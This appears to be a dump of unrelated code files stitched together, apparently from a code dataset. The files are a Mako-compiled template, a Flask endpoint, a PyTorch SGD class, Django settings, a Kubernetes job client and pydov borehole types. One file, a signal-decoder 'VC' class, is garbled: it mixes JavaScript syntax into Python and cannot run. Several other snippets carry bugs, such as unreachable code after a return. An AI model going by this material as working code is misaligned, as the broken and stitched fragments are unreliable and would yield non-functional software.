# @@protoc_insertion_point(class_scope:container.PersistentVolumeClaim)
})
_sym_db.RegisterMessage(PersistentVolumeClaim)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| StarcoderdataPython |
82878 | from types import CodeType as Code
def construct():
...
def create() -> Object:
...
def define() -> Code:
...
| StarcoderdataPython |
135007 | <filename>modules/check_result.mako.py
# -*- coding:utf-8 -*-
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
STOP_RENDERING = runtime.STOP_RENDERING
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 10
_modified_time = 1510155020.292707
_enable_loop = True
_template_filename = 'htdocs/check_result.mako'
_template_uri = 'check_result.mako'
_source_encoding = 'utf-8'
_exports = []
def render_body(context,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
cmp = context.get('cmp', UNDEFINED)
__M_writer = context.writer()
__M_writer('<!DOCTYPE html>\n<html>\n<head>\n\n <script src="/static/jquery.min.1.9.1.js"></script>\n <title></title>\n</head>\n <script language="JavaScript">\n var $j = jQuery.noConflict();\n\n function exists() {\n return true;\n }\n $j(document).ready(function() {\n window.parent.verifyData(\'')
__M_writer(str(cmp))
__M_writer("');\n });\n </script>\n<body>\n</body>\n</html>")
return ''
finally:
context.caller_stack._pop_frame()
"""
__M_BEGIN_METADATA
{"filename": "htdocs/check_result.mako", "source_encoding": "utf-8", "uri": "check_result.mako", "line_map": {"16": 0, "24": 15, "30": 24, "22": 1, "23": 15}}
__M_END_METADATA
"""
| StarcoderdataPython |
1621968 | <reponame>ace-gabriel/chrome-extension<filename>application/main/clients/city.py
# -*- encoding='utf-8'
import pandas as pd
import numpy as np
from flask import request, jsonify, g
from flask import Blueprint
from ...utils.esquery import EsqueryHelper
from ...utils.query import QueryHelper
from ...utils.auth import requires_auth, json_validate, requires_rule
from ...utils.helper import uuid_gen
from ...utils.query_census import query_census_detail
from ...utils.request import get_ipaddr
from ...settings import HOME_INDEX,HOME_TYPE
from ...finance.search_city import *
from index import app,db,es,redis_store,limiter,home_cache,city_cache
from ...models import IpQuery
import datetime
import json
city_bp = Blueprint('client_city', __name__)
logger = app.logger
def rate_limit_from_g():
return g.limit
@city_bp.route('/dashboard/search', methods=['POST'])
@requires_rule
@limiter.limit(rate_limit_from_g)
@uuid_gen
def get_city_data():
rule = g.current_rule
incoming = request.get_json()
city = incoming.get('city')
state = incoming.get('state')
engine_str = app.config['SQLALCHEMY_BINDS']['datawarehouse']
city_geoid = map_geoid(engine_str, city, state)
if city_geoid == None:
return None
cached_result = city_cache[city_geoid]
if cached_result:
return jsonify(**json.loads(cached_result))
nb_stats = scoring_neighborhood(city)
real_estate_stats = get_city_sources(city)
census_result = query_census_detail(engine_str, city_geoid)
result = dict(nb_stats.items() + real_estate_stats.items() + census_result.items())
# set key -> value pair to cache into database
city_cache.set_key_value(name = city_geoid, value = json.dumps(result),expiration = 60 * 60 * 24 * 365 * 99)
return jsonify(result)
| StarcoderdataPython |
13565 | from .linear_torch import TorchGradientDescentAutogradRegression
import torch, math, random
class stochasticGradientDescent(TorchGradientDescentAutogradRegression):
def __init__(self, X, Y, alpha, **kwargs):
super(stochasticGradientDescent, self).__init__(X, Y, alpha, **kwargs)
try:
h = kwargs['batch_size']
self.iterations = int(self.Y.shape[0])/h
self.batch_size = int(self.Y.shape[0])/self.iterations
except:
self.iterations = int(self.Y.shape[0])
self.batch_size = 1
try:
self.epochs_no = kwargs['epochs_no']
except:
self.epochs_no = 1
self.batches = None
def assign_batchs(self):
r = range(int(self.Y.shape[0]))
random.shuffle(r, random.random)
batches = list()
for i in xrange(self.iterations):
batches.append(r[i:i+self.batch_size])
self.batches = batches
return batches
def ForwardFunction(self, i):
X = self.X[self.batches[i]]
Y = self.Y[self.batches[i]]
p = torch.mean((Y-X.mm(self.theta.double()))**2) #Loss function forward function
self.objective = p
return p
def get_grads(self, i):
self.initialise_theta()
k = self.ForwardFunction(i)
self.objective.backward()
self.gradients = self.theta.grad
return self.gradients
def epoch(self):
for i in xrange(self.iterations):
self.update_theta(i)
return self.theta
def update_theta(self, i):
h = self.get_grads(i)
current_theta = self.theta.clone() #cloing theta so that we don't update in-place values
current_theta -= self.gradients*self.alpha
self.theta = current_theta
return current_theta
def train(self):
self.initialise_theta()
error = 0.0001
for i in xrange(self.epochs_no):
self.assign_batchs()
print('')
theta = self.epoch().double()
print('Epoch - '+ str(i+1))
print('')
return theta
print(self.MSE(theta))
if self.MSE(theta) <= error:
break
print('### Training complete') | StarcoderdataPython |
1661275 | <filename>threeDCNN.py
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNNLayer(nn.Module):
def __init__(self, C_in, C_out):
super(CNNLayer, self).__init__()
self.layer = torch.nn.Sequential(
torch.nn.Conv3d(C_in, C_out, 3, 1, 1),
torch.nn.BatchNorm3d(C_out),
torch.nn.ReLU(),
torch.nn.Conv3d(C_out, C_out, 3, 1, 1),
torch.nn.BatchNorm3d(C_out),
torch.nn.ReLU()
)
def forward(self, x):
return self.layer(x)
class Downsample(nn.Module):
def __init__(self, kernel_size):
super(Downsample, self).__init__()
self.layer = torch.nn.MaxPool3d(kernel_size)
def forward(self, x):
return self.layer(x)
class Upsample(nn.Module):
def __init__(self, C):
super(Upsample, self).__init__()
self.C = torch.nn.Conv3d(C, C // 2, 1, 1)
def forward(self, x):
up = F.interpolate(x, scale_factor=2, mode='trilinear')
return self.C(up)
class ThreeDCNN(nn.Module):
def __init__(self):
super(ThreeDCNN, self).__init__()
self.Conv1 = CNNLayer(1, 32)
self.Downsample1 = Downsample(2)
self.Conv2 = CNNLayer(32, 64)
self.Downsample2 = Downsample(2)
self.Conv3 = CNNLayer(64, 128)
self.Downsample3 = Downsample(2)
self.Conv4 = CNNLayer(128, 256)
self.Downsample4 = Downsample(2)
self.Conv5 = CNNLayer(256, 512)
self.Upsample1 = Upsample(512)
self.Conv6 = CNNLayer(512, 256)
self.Upsample2 = Upsample(256)
self.Conv7 = CNNLayer(256, 128)
self.Upsample3 = Upsample(128)
self.Conv8 = CNNLayer(128, 64)
self.Upsample4 = Upsample(64)
self.Conv9 = CNNLayer(64, 32)
self.final = torch.nn.Conv3d(32, 3, 3, 1, 1)
def forward(self, x):
x1= self.Conv1(x)
x=self.Downsample1(x1)
x2=self.Conv2(x)
x=self.Downsample2(x2)
x3=self.Conv3(x)
x=self.Downsample3(x3)
x4=self.Conv4(x)
x=self.Downsample4(x4)
x=self.Conv5(x)
x=self.Upsample1(x)
x=torch.cat([x,x4],dim=1)
x=self.Conv6(x)
x=self.Upsample2(x)
x=torch.cat([x,x3],dim=1)
x=self.Conv7(x)
x=self.Upsample3(x)
x=torch.cat([x,x2],dim=1)
x=self.Conv8(x)
x=self.Upsample4(x)
x=torch.cat([x,x1],dim=1)
x=self.Conv9(x)
x=self.final(x)
return x
| StarcoderdataPython |
3269301 | from pillcase.pillcase import Pillcase
class VC(object):
def __init__(self):
self.config = {
"buffersize": 512,
"clearInterval": 50,
"overScan": 0.82,
"hOffset": 0.06525,
"pulseLength": (0.2 / 1000),
"lineWidth": 2.5,
"brightness": 1,
"saturation": 1,
"blend": True,
"hFreq": 225.0,
"vFreq": 3
}
self.buffersize = self.config["buffersize"]
self.sig = {
"LMin": 0.0,
"LMax": 1.0,
"CMin": -1.0,
"CMax": 1.0,
}
self.hPhase = 0
self.vPhase = 0
self.pulse = {
"time": 0,
"timeout": 0,
"luma": 0,
"lumaPrev": 0,
"chroma": 0,
"chromaPrev": 0,
"changed": False,
"ready": False
}
self.timing = {
"time": 0,
"lastV": 0,
"lastH": 0,
}
self.field = 0
self.chromaField = 0
self.chromaDelay = []
self.chromaDelayIndex = 0
self.lines = []
self.currLine = {
"x1": 0,
"y": 0,
"maxPhase": 0,
"colors": []
}
self.lastClear = 0
self.clearInterval = self.config["clearInterval"]
self.overScan = self.config["overScan"]
self.hOffset = self.config["hOffset"]
self.pulseLength = self.config["pulseLength"]
self.canvas = config.canvas
self.ctx = self.canvas.getContext("2d")
self.width = self.canvas.width
self.height = self.canvas.height
self.lineWidth = self.config["lineWidth"]
self.blend = self.config["blend"]
self.brightness = self.config["brightness"]
self.saturation = self.config["saturation"]
requestAnimationFrame(() => self.draw())
self.audioCtx = new window.AudioContext()
self.sampleRate = self.audioCtx.sampleRate
self.audioInput = None
self.decoder = None
self.hFreqTarget = 1.0 / self.config["hFreq"] * self.sampleRate
self.vFreqTarget = 1.0 / self.config["vFreq"] * self.sampleRate
self.hFreq = self.hFreqTarget
self.vFreq = self.vFreqTarget
navigator.mediaDevices.getUserMedia(
{
audio: {
echoCancellation: False,
noiseSuppression: False,
autoGainControl: False,
channelCount: 2
}
})
.then(stream =>
{
self.audioInput = self.audioCtx.createMediaStreamSource(stream)
self.decoder = self.audioCtx.createScriptProcessor(self.buffersize, 2, 2)
self.decoder.onaudioprocess = event => self.process(event)
self.audioInput.connect(self.decoder)
self.decoder.connect(self.audioCtx.destination) // Needed to work around webkit bug
})
.catch(console.error)
def hPhaseToX(hPhase, vPhase, field):
return ((hPhase - self.hOffset) / self.overScan) * self.width
def vPhaseToY(hPhase, vPhase, field):
return (vPhase + (field / self.vFreq) * self.hFreq * 0.5) * self.height
def YCbCrToRGB(y, cb, cr):
r = y + 45 * cr / 32
g = y - (11 * cb + 23 * cr) / 32
b = y + 113 * cb / 64
return [r, g, b]
def process(event):
lSamples = event.inputBuffer.getChannelData(0)
cSamples = event.inputBuffer.getChannelData(1)
sampleRate = self.sampleRate
s = self.sig
p = self.pulse
blank = False
for i in range(0, len(lSamples)):
self.timing.time += 1
lSample = lSamples[i] + Math.random() * 0.01 - 0.005
cSample = cSamples[i] + Math.random() * 0.01 - 0.005
if (lSample < s.LMin) s.LMin = lSample
if (lSample > s.LMax) s.LMax = lSample
s.LMin *= 1.0 - (1.0 / sampleRate)
s.LMax *= 1.0 - (1.0 / sampleRate)
if (s.LMin > -0.025) s.LMin = -0.025
if (s.LMax < 0.025) s.LMax = 0.025
if (cSample < s.CMin) s.CMin = cSample
if (cSample > s.CMax) s.CMax = cSample
s.CMin *= 1.0 - (1.0 / sampleRate)
s.CMax *= 1.0 - (1.0 / sampleRate)
if (s.CMin > -0.05) s.CMin = -0.05
if (s.CMax < 0.05) s.CMax = 0.05
luma = (lSample * 2.0 - s.LMin) / (s.LMax - s.LMin) * self.brightness * 255
chroma = (cSample * 2.0 - s.CMin) / (s.CMax - s.CMin) * self.saturation * 255
chromaLast = self.chromaDelay[self.chromaDelayIndex] || 0
if (self.chromaDelayIndex < sampleRate / 10.0):
self.chromaDelay[self.chromaDelayIndex] = chroma
self.chromaDelayIndex++
chroma = chroma - 128
chromaLast = chromaLast - 128
if (self.chromaField == 0):
[r, g, b] = self.YCbCrToRGB(luma, chromaLast, chroma)
else:
[r, g, b] = self.YCbCrToRGB(luma, chroma, chromaLast)
if (self.currLine.colors.length < 1024):
self.currLine.colors.append(
{
"phase": self.hPhase,
"r": Math.max(Math.min(Math.round(r), 255), 0),
"g": Math.max(Math.min(Math.round(g), 255), 0),
"b": Math.max(Math.min(Math.round(b), 255), 0)
}
)
self.currLine.maxPhase = self.hPhase
self.hPhase += 1.0 / self.hFreq
self.vPhase += 1.0 / self.vFreq
self.currLine.x2 = self.hPhaseToX(self.hPhase, self.vPhase, self.field)
if (((s.LMax - s.LMin) > 0.1) and ((s.CMax - s.CMin) > 0.1)):
if (lSample < s.LMin * 0.5):
p.luma = -1
elif (lSample > s.LMax * 0.5):
p.luma = 1
else:
p.luma = 0
if (cSample < s.CMin * 0.5):
p.chroma = -1
elif (cSample > s.CMax * 0.5):
p.chroma = 1
else:
p.chroma = 0
if ((p.luma != p.lumaPrev) or (p.chroma != p.chromaPrev)):
p.time = 0
p.lumaPrev = p.luma
p.chromaPrev = p.chroma
p.changed = True
if ((p.luma != 0) and (p.chroma != 0)):
p.time += 1.0 / sampleRate
if ((p.time > self.pulseLength * 0.5) and (p.changed == True)):
p.changed = False
if (p.ready == False):
p.ready = True
p.timeout = self.pulseLength * 1.25
else:
p.ready = False
blank = True
if ((self.timing.time - self.timing.lastH < self.hFreqTarget * 1.5) and (self.timing.time - self.timing.lastH > self.hFreqTarget * 0.5)):
self.hFreq = self.hFreq * 0.9 + (self.timing.time - self.timing.lastH) * 0.1
self.timing.lastH = self.timing.time
self.hPhase = 0
self.chromaDelayIndex = 0
if (p.luma > 0):
self.chromaField = 0
else:
self.chromaField = 1
if (p.luma != p.chroma):
if ((self.timing.time - self.timing.lastV < self.vFreqTarget * 1.5) and (self.timing.time - self.timing.lastV > self.vFreqTarget * 0.5)):
self.vFreq = self.vFreq * 0.75 + (self.timing.time - self.timing.lastV) * 0.25
self.timing.lastV = self.timing.time
self.vPhase = 0
self.chromaField = 1
if (p.luma > 0):
self.field = 0
else:
self.field = 1
if (p.ready == True):
p.timeout -= 1.0 / sampleRate
if (p.timeout <= 0):
p.ready = False
else:
p.luma = p.lumaPrev = 0
p.chroma = p.chromaPrev = 0
p.changed = False
p.ready = False
self.hFreq = self.hFreq * (1.0 - 1.0 / sampleRate) + self.hFreqTarget * (1.0 / sampleRate)
self.vFreq = self.vFreq * (1.0 - 1.0 / sampleRate) + self.vFreqTarget * (1.0 / sampleRate)
if (self.hPhase >= 1.0):
blank = True
self.hPhase -= 1.0
self.chromaDelayIndex = 0
if (self.chromaField == 1):
self.chromaField = 0
else:
self.chromaField = 1
if (self.vPhase >= 1.0):
blank = True
self.vPhase -= 1.0
if (self.field == 0):
self.field = 1
else:
self.field = 0
if (blank == True):
if ((self.lines.length < 1024) and (self.currLine.colors.length > 5) and (self.currLine.maxPhase > 0)):
self.lines.append(self.currLine)
self.currLine =
{
x1: self.hPhaseToX(self.hPhase, self.vPhase, self.field),
y: self.vPhaseToY(self.hPhase, self.vPhase, self.field),
maxPhase: 0,
colors: []
}
blank = False
def draw():
requestAnimationFrame(() => self.draw())
if (Date.now() - self.lastClear > self.clearInterval):
self.ctx.fillStyle = 'rgba(0,0,0,0.05)'
self.ctx.globalCompositeOperation = 'source-over'
self.ctx.fillRect(0, 0, self.width, self.height)
self.lastClear = Date.now()
if (self.blend == True):
self.ctx.globalCompositeOperation = 'screen'
self.ctx.lineWidth = self.lineWidth
foreach (line in self.lines):
grd = self.ctx.createLinearGradient(line.x1, line.y, line.x2, line.y)
foreach (color in line.colors):
grd.addColorStop(color.phase / line.maxPhase, 'rgb(' + color.r + ',' + color.g + ',' + color.b + ')')
self.ctx.beginPath()
self.ctx.moveTo(line.x1 + Math.random() * 2.0 - 1.0, line.y + Math.random() * 2.0 - 1.0)
self.ctx.lineTo(line.x2 + Math.random() * 2.0 - 1.0, line.y + Math.random() * 2.0 - 1.0)
self.ctx.strokeStyle = grd
self.ctx.stroke()
self.lines = []
| StarcoderdataPython |
1779425 | """
Django settings for homevisit_project project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import sys
from logging import Filter
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
DEV_SECRET_KEY = "mrsrrt0nzre%73*437pll372ky4rch_@y%g1$sa_@*=$0j89ex"
SECRET_KEY = os.getenv("SECRET_KEY", DEV_SECRET_KEY)
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = "SECRET_KEY" not in os.environ
HOST_NAME = os.getenv("HOST_NAME", "localhost")
ALLOWED_HOSTS = [HOST_NAME]
# Email settings
EMAIL_BACKEND = "django.core.mail.backends.smtp.EmailBackend"
EMAIL_HOST = os.getenv("EMAIL_HOST")
EMAIL_USE_TLS = os.getenv("EMAIL_USE_TLS", True)
EMAIL_PORT = os.getenv("EMAIL_PORT", 587)
EMAIL_HOST_USER = os.getenv("EMAIL_HOST_USER")
EMAIL_HOST_PASSWORD = os.getenv("EMAIL_HOST_PASSWORD")
# Homevisit-specific settings
HOMEVISIT_HIDE_WEEKS_AFTER = int(os.getenv("HOMEVISIT_HIDE_WEEKS_AFTER", 52))
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"homevisit",
"crispy_forms",
"phonenumber_field",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "homevisit_project.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
WSGI_APPLICATION = "homevisit_project.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "US/Pacific"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = "/static/"
X_FRAME_OPTIONS = "DENY"
# Don't log to console during tests: https://stackoverflow.com/questions/5255657
TESTING_MODE = len(sys.argv) > 1 and sys.argv[1] == "test"
if not TESTING_MODE:
STATIC_ROOT = os.path.join(BASE_DIR, "static")
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_SSL_REDIRECT = True
class NotInTestingFilter(Filter):
def filter(self, record):
return not TESTING_MODE
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"filters": {"testing": {"()": NotInTestingFilter}},
"formatters": {
"standard": {
"format": "%(asctime)-15s [%(levelname)-7s] %(name)-14s: %(message)s"
}
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"filters": ["testing"],
"formatter": "standard",
}
},
"loggers": {"homevisit": {"handlers": ["console"], "level": "DEBUG"}},
}
CRISPY_TEMPLATE_PACK = "bootstrap4"
PHONENUMBER_DEFAULT_REGION = "US"
| StarcoderdataPython |
149445 | """
utilities routines associated with Kubernetes python client
"""
import os
import copy
import base64
import yaml
from kubernetes import client, config
from kubernetes.client.rest import ApiException
from pandaharvester.harvesterconfig import harvester_config
from pandaharvester.harvestermisc.info_utils import PandaQueuesDict
class k8s_Client(object):
def __init__(self, namespace, config_file=None):
config.load_kube_config(config_file=config_file)
self.namespace = namespace if namespace else 'default'
self.corev1 = client.CoreV1Api()
self.batchv1 = client.BatchV1Api()
self.deletev1 = client.V1DeleteOptions(propagation_policy='Background')
def read_yaml_file(self, yaml_file):
with open(yaml_file) as f:
yaml_content = yaml.load(f, Loader=yaml.FullLoader)
return yaml_content
def create_job_from_yaml(self, yaml_content, work_spec, cert, cert_in_secret=True, cpuadjustratio=100, memoryadjustratio=100):
panda_queues_dict = PandaQueuesDict()
queue_name = panda_queues_dict.get_panda_queue_name(work_spec.computingSite)
yaml_content['metadata']['name'] = yaml_content['metadata']['name'] + "-" + str(work_spec.workerID)
yaml_content['spec']['template'].setdefault('metadata', {})
yaml_content['spec']['template']['metadata'].update({
'labels': {'resourceType': str(work_spec.resourceType)}})
yaml_containers = yaml_content['spec']['template']['spec']['containers']
del(yaml_containers[1:len(yaml_containers)])
container_env = yaml_containers[0]
container_env.setdefault('resources', {})
# note that predefined values in the yaml template will NOT be overwritten
if work_spec.nCore > 0:
container_env['resources'].setdefault('limits', {
'cpu': str(work_spec.nCore)})
container_env['resources'].setdefault('requests', {
'cpu': str(work_spec.nCore*cpuadjustratio/100.0)})
if work_spec.minRamCount > 4:
# K8S minimum memory limit = 4 MB
container_env['resources'].setdefault('limits', {
'memory': str(work_spec.minRamCount) + 'M'})
container_env['resources'].setdefault('requests', {
'memory': str(work_spec.minRamCount*memoryadjustratio/100.0) + 'M'})
container_env.setdefault('env', [])
container_env['env'].extend([
{'name': 'computingSite', 'value': work_spec.computingSite},
{'name': 'pandaQueueName', 'value': queue_name},
{'name': 'resourceType', 'value': work_spec.resourceType},
{'name': 'proxySecretPath', 'value': cert if cert_in_secret else None},
{'name': 'proxyContent', 'value': None if cert_in_secret else self.set_proxy(cert)},
{'name': 'workerID', 'value': str(work_spec.workerID)},
{'name': 'logs_frontend_w', 'value': harvester_config.pandacon.pandaCacheURL_W},
{'name': 'logs_frontend_r', 'value': harvester_config.pandacon.pandaCacheURL_R},
{'name': 'PANDA_JSID', 'value': 'harvester-' + harvester_config.master.harvester_id},
{'name': 'HARVESTER_WORKER_ID', 'value': str(work_spec.workerID)},
{'name': 'HARVESTER_ID', 'value': harvester_config.master.harvester_id}
])
if 'affinity' not in yaml_content['spec']['template']['spec']:
yaml_content = self.set_affinity(yaml_content)
rsp = self.batchv1.create_namespaced_job(body=yaml_content, namespace=self.namespace)
return rsp
def get_pods_info(self):
pods_list = list()
ret = self.corev1.list_namespaced_pod(namespace=self.namespace)
for i in ret.items:
pod_info = {}
pod_info['name'] = i.metadata.name
pod_info['start_time'] = i.status.start_time.replace(tzinfo=None) if i.status.start_time else i.status.start_time
pod_info['status'] = i.status.phase
pod_info['status_reason'] = i.status.conditions[0].reason if i.status.conditions else None
pod_info['status_message'] = i.status.conditions[0].message if i.status.conditions else None
pod_info['job_name'] = i.metadata.labels['job-name'] if i.metadata.labels and 'job-name' in i.metadata.labels else None
pods_list.append(pod_info)
return pods_list
def filter_pods_info(self, pods_list, job_name=None):
if job_name:
pods_list = [ i for i in pods_list if i['job_name'] == job_name]
return pods_list
def get_jobs_info(self, job_name=None):
jobs_list = list()
field_selector = 'metadata.name=' + job_name if job_name else ''
ret = self.batchv1.list_namespaced_job(namespace=self.namespace, field_selector=field_selector)
for i in ret.items:
job_info = {}
job_info['name'] = i.metadata.name
job_info['status'] = i.status.conditions[0].type
job_info['status_reason'] = i.status.conditions[0].reason
job_info['status_message'] = i.status.conditions[0].message
jobs_list.append(job_info)
return jobs_list
def delete_pods(self, pod_name_list):
retList = list()
for pod_name in pod_name_list:
rsp = {}
rsp['name'] = pod_name
try:
self.corev1.delete_namespaced_pod(name=pod_name, namespace=self.namespace, body=self.deletev1, grace_period_seconds=0)
except ApiException as _e:
rsp['errMsg'] = '' if _e.status == 404 else _e.reason
else:
rsp['errMsg'] = ''
retList.append(rsp)
return retList
def delete_job(self, job_name):
self.batchv1.delete_namespaced_job(name=job_name, namespace=self.namespace, body=self.deletev1, grace_period_seconds=0)
def set_proxy(self, proxy_path):
with open(proxy_path) as f:
content = f.read()
content = content.replace("\n", ",")
return content
def set_affinity(self, yaml_content):
yaml_content['spec']['template']['spec']['affinity'] = {}
yaml_affinity = yaml_content['spec']['template']['spec']['affinity']
res_element = {'SCORE', 'MCORE'}
affinity_spec = {
'preferredDuringSchedulingIgnoredDuringExecution': [
{'weight': 100, 'podAffinityTerm': {
'labelSelector': {'matchExpressions': [
{'key': 'resourceType', 'operator': 'In', 'values': ['SCORE']}]},
'topologyKey': 'kubernetes.io/hostname'}
}]}
resourceType = yaml_content['spec']['template']['metadata']['labels']['resourceType']
if resourceType == 'SCORE':
yaml_affinity['podAffinity'] = copy.deepcopy(affinity_spec)
yaml_affinity['podAffinity']['preferredDuringSchedulingIgnoredDuringExecution'][0]['podAffinityTerm']['labelSelector']['matchExpressions'][0]['values'][0] = resourceType
yaml_affinity['podAntiAffinity'] = copy.deepcopy(affinity_spec)
yaml_affinity['podAntiAffinity']['preferredDuringSchedulingIgnoredDuringExecution'][0]['podAffinityTerm']['labelSelector']['matchExpressions'][0]['values'][0] = res_element.difference({resourceType}).pop()
return yaml_content
def create_or_patch_secret(self, file_list, secret_name):
# api_version = 'v1'
# kind = 'Secret'
# type='kubernetes.io/tls'
metadata = {'name': secret_name, 'namespace': self.namespace}
data = {}
for file in file_list:
filename = os.path.basename(file)
with open(file, 'rb') as f:
str = f.read()
data[filename] = base64.b64encode(str).decode()
body = client.V1Secret(data=data, metadata=metadata)
try:
rsp = self.corev1.patch_namespaced_secret(name=secret_name, body=body, namespace=self.namespace)
except ApiException as e:
print('Exception when patch secret: {0} . Try to create secret instead...'.format(e))
rsp = self.corev1.create_namespaced_secret(body=body, namespace=self.namespace)
return rsp
| StarcoderdataPython |
3304508 | # -*- coding: utf-8 -*-
"""Module containing the DOV data type for boreholes (Boring), including
subtypes."""
import numpy as np
from pydov.types.abstract import (
AbstractDovType,
AbstractDovSubType,
)
class InformeleStratigrafieLaag(AbstractDovSubType):
_name = 'informele_stratigrafie_laag'
_rootpath = './/informelestratigrafie/laag'
_fields = [{
'name': 'diepte_laag_van',
'source': 'xml',
'sourcefield': '/van',
'definition': 'Diepte van de bovenkant van de laag informele '
'stratigrafie in meter.',
'type': 'float',
'notnull': False
}, {
'name': 'diepte_laag_tot',
'source': 'xml',
'sourcefield': '/tot',
'definition': 'Diepte van de onderkant van de laag informele '
'stratigrafie in meter.',
'type': 'float',
'notnull': False
}, {
'name': 'beschrijving',
'source': 'xml',
'sourcefield': '/beschrijving',
'definition': 'Benoeming van de eenheid van de laag informele '
'stratigrafie in vrije tekst (onbeperkt in lengte).',
'type': 'string',
'notnull': False
}]
def __init__(self):
"""Initialisation."""
super(InformeleStratigrafieLaag, self).__init__(
'informele_stratigrafie_laag')
@classmethod
def from_xml_element(cls, element):
"""Build an instance of this subtype from a single XML element.
Parameters
----------
element : etree.Element
XML element representing a single record of this subtype.
"""
laag = InformeleStratigrafieLaag()
for field in cls.get_fields().values():
laag.data[field['name']] = laag._parse(
func=element.findtext,
xpath=field['sourcefield'],
namespace=None,
returntype=field.get('type', None)
)
return laag
class InformeleStratigrafie(AbstractDovType):
"""Class representing the DOV data type for boreholes."""
_subtypes = [InformeleStratigrafieLaag]
_fields = [{
'name': 'pkey_interpretatie',
'source': 'wfs',
'sourcefield': 'Interpretatiefiche',
'type': 'string'
}, {
'name': 'pkey_boring',
'source': 'custom',
'type': 'string',
'definition': 'URL die verwijst naar de gegevens van de boring '
'waaraan deze informele stratigrafie gekoppeld is ('
'indien gekoppeld aan een boring).',
'notnull': False
}, {
'name': 'pkey_sondering',
'source': 'custom',
'type': 'string',
'definition': 'URL die verwijst naar de gegevens van de sondering '
'waaraan deze informele stratigrafie gekoppeld is ('
'indien gekoppeld aan een sondering).',
'notnull': False
}, {
'name': 'betrouwbaarheid_interpretatie',
'source': 'wfs',
'sourcefield': 'Betrouwbaarheid',
'type': 'string'
}, {
'name': 'x',
'source': 'wfs',
'sourcefield': 'X_mL72',
'type': 'float'
}, {
'name': 'y',
'source': 'wfs',
'sourcefield': 'Y_mL72',
'type': 'float'
}]
def __init__(self, pkey):
"""Initialisation.
Parameters
----------
pkey : str
Permanent key of the Boring (borehole), being a URI of the form
`https://www.dov.vlaanderen.be/data/boring/<id>`.
"""
super(InformeleStratigrafie, self).__init__(
'interpretatie', pkey)
@classmethod
def from_wfs_element(cls, feature, namespace):
"""Build `Boring` instance from a WFS feature element.
Parameters
----------
feature : etree.Element
XML element representing a single record of the WFS layer.
namespace : str
Namespace associated with this WFS featuretype.
Returns
-------
boring : Boring
An instance of this class populated with the data from the WFS
element.
"""
infstrat = InformeleStratigrafie(
feature.findtext('./{%s}Interpretatiefiche' % namespace))
typeproef = cls._parse(
func=feature.findtext,
xpath='Type_proef',
namespace=namespace,
returntype='string'
)
if typeproef == 'Boring':
infstrat.data['pkey_boring'] = cls._parse(
func=feature.findtext,
xpath='Proeffiche',
namespace=namespace,
returntype='string'
)
infstrat.data['pkey_sondering'] = np.nan
elif typeproef == 'Sondering':
infstrat.data['pkey_sondering'] = cls._parse(
func=feature.findtext,
xpath='Proeffiche',
namespace=namespace,
returntype='string'
)
infstrat.data['pkey_boring'] = np.nan
else:
infstrat.data['pkey_boring'] = np.nan
infstrat.data['pkey_sondering'] = np.nan
for field in cls.get_fields(source=('wfs',)).values():
if field['name'] in ['pkey_boring', 'pkey_sondering']:
continue
infstrat.data[field['name']] = cls._parse(
func=feature.findtext,
xpath=field['sourcefield'],
namespace=namespace,
returntype=field.get('type', None)
)
return infstrat
class HydrogeologischeStratigrafieLaag(AbstractDovSubType):
_name = 'hydrogeologische_stratigrafie_laag'
_rootpath = './/hydrogeologischeinterpretatie/laag'
_fields = [{
'name': 'diepte_laag_van',
'source': 'xml',
'sourcefield': '/van',
'definition': 'Diepte van de bovenkant van de laag hydrogeologische '
'stratigrafie in meter.',
'type': 'float',
'notnull': False
}, {
'name': 'diepte_laag_tot',
'source': 'xml',
'sourcefield': '/tot',
